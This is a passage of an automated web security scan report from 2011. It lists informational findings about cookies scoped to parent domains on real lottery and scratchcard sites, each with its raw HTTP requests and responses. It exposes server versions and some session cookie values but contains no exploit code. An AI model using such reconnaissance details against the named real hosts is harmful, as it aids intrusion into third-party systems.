Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 10074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut i
...[SNIP]...

11.162. http://www.postcodelottery.com/AboutUs/TermsAndConditions.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/AboutUs/TermsAndConditions.htm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AboutUs/TermsAndConditions.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:23:30 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:23:30 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 40166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut i
...[SNIP]...

11.163. http://www.postcodelottery.com/Charities.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/Charities.htm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Charities.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:33 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:34 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 22665

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.164. http://www.postcodelottery.com/DrawResults.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/DrawResults.htm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /DrawResults.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:25 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:26 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 20168

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.165. http://www.postcodelottery.com/FunGames.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/FunGames.htm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FunGames.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:34 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:35 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 11179

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.166. http://www.postcodelottery.com/FunGames/FreeGames.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/FunGames/FreeGames.htm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FunGames/FreeGames.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:20:45 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:20:45 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 12413

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.167. http://www.postcodelottery.com/FunGames/PaidGames.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/FunGames/PaidGames.htm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FunGames/PaidGames.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:20:45 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:20:45 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 11318

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.168. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/FunGames/PaidGames/PostcodeLotteryScratch.htm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FunGames/PaidGames/PostcodeLotteryScratch.htm HTTP/1.1
Host: www.postcodelottery.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BALANCEID=balancer.route1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:41:45 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 11:41:45 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Content-Length: 15840

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.169. http://www.postcodelottery.com/FunGames/PostcodeChallenge.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/FunGames/PostcodeChallenge.htm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FunGames/PostcodeChallenge.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:20:45 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:20:46 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 10718

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.170. http://www.postcodelottery.com/Games/Scratchcards.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/Games/Scratchcards.htm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Games/Scratchcards.htm HTTP/1.1
Host: www.postcodelottery.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 16 May 2011 11:41:43 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 11:41:43 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Location: http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Content-Length: 0

11.171. http://www.postcodelottery.com/Home.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/Home.htm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:11 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:12 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 14838

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.172. http://www.postcodelottery.com/HowItWorks.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/HowItWorks.htm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HowItWorks.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:18 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:19 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 15444

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.173. http://www.postcodelottery.com/MyAccount.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/MyAccount.htm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.174. http://www.postcodelottery.com/RSS.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/RSS.htm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RSS.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:07 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:08 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/xml;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 76958

<?xml version="1.0" ?>
<rss version="2.0">
                       <channel>
   <title>RSS</title>
   <link>http://www.postcodelottery.com/RSS.htm</link>
   <description></description>
           <item>
               <title>A Breath Of Fres
...[SNIP]...

11.175. http://www.postcodelottery.com/Sitemap.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/Sitemap.htm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sitemap.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:23:39 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:23:39 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 10146

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

11.176. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.postcodelottery.com
Path:	/PlayNOW/OrderYourTickets.htm

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.177. http://www.primegrattage.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primegrattage.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MTH=1072%2D100%2Dfr; expires=Wed, 15-Jun-2011 12:00:34 GMT; domain=.primegrattage.com; path=/
ARC=130138; expires=Tue, 15-May-2012 12:00:34 GMT; domain=.primegrattage.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.primegrattage.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.178. http://www.primescratchcards.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ARC=130137; expires=Tue, 15-May-2012 11:40:22 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.primescratchcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

11.179. http://www.primescratchcards.com/HelpDepositMethods.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/HelpDepositMethods.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ARC=130137; expires=Tue, 15-May-2012 12:34:54 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /HelpDepositMethods.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 28284
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:54 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

11.180. http://www.primescratchcards.com/InviteFriend.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/InviteFriend.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 26530
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

